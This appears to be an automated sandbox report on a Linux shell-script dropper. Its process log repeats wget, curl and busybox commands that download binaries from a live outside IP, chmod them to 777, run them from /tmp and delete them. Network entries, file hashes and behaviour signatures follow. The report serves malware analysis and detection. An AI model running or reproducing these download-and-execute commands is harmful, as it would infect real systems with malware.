[curl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/chmod

[chmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA

[./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/rm

[rm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/wget

[wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/chmod

[chmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw

[./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/rm

[rm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/wget

[wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/chmod

[chmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb

[./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/rm

[rm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/wget

[wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/chmod

[chmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k

[./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/rm

[rm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/chmod

[chmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613

[./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/rm

[rm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/wget

[wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/chmod

[chmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp

[./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/rm

[rm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/wget

[wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/chmod

[chmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2

[./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/rm

[rm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/wget

[wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/chmod

[chmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY

[./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/rm

[rm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/wget

[wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/chmod

[chmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck

[./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/rm

[rm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/wget

[wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/chmod

[chmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG

[./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/rm

[rm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/wget

[wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/chmod

[chmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv

[./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/rm

[rm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/wget

[wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/chmod

[chmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah

[./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/rm

[rm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/wget

[wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/chmod

[chmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2

[./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/rm

[rm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/wget

[wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/chmod

[chmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY

[./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/rm

[rm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/wget

[wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/chmod

[chmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck

[./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/rm

[rm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/wget

[wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/chmod

[chmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG

[./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/rm

[rm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/wget

[wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/chmod

[chmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv

[./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/rm

[rm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/wget

[wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/chmod

[chmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah

[./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/rm

[rm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/wget

[wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/chmod

[chmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

[./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/rm

[rm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/chmod

[chmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm

[./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/rm

[rm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/wget

[wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/chmod

[chmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA

[./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/rm

[rm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/wget

[wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/chmod

[chmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw

[./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/rm

[rm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/wget

[wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/chmod

[chmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb

[./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/rm

[rm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/wget

[wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/chmod

[chmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k

[./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/rm

[rm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/chmod

[chmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613

[./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/rm

[rm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/wget

[wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/chmod

[chmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp

[./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/rm

[rm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:42

Reported

2024-10-21 01:45

Platform

debian9-mipsel-20240729-en

Max time kernel

73s

Max time network

76s

Command Line

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i N/A
N/A /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm N/A
N/A /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA N/A
N/A /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw N/A
N/A /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb N/A
N/A /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k N/A
N/A /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 N/A
N/A /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp N/A
N/A /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 N/A
N/A /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY N/A
N/A /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck N/A
N/A /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG N/A
N/A /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv N/A
N/A /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah N/A
N/A /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 N/A
N/A /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY N/A
N/A /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck N/A
N/A /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG N/A
N/A /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv N/A
N/A /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah N/A
N/A /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i N/A
N/A /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm N/A
N/A /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA N/A
N/A /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw N/A
N/A /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb N/A
N/A /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k N/A
N/A /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 N/A
N/A /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
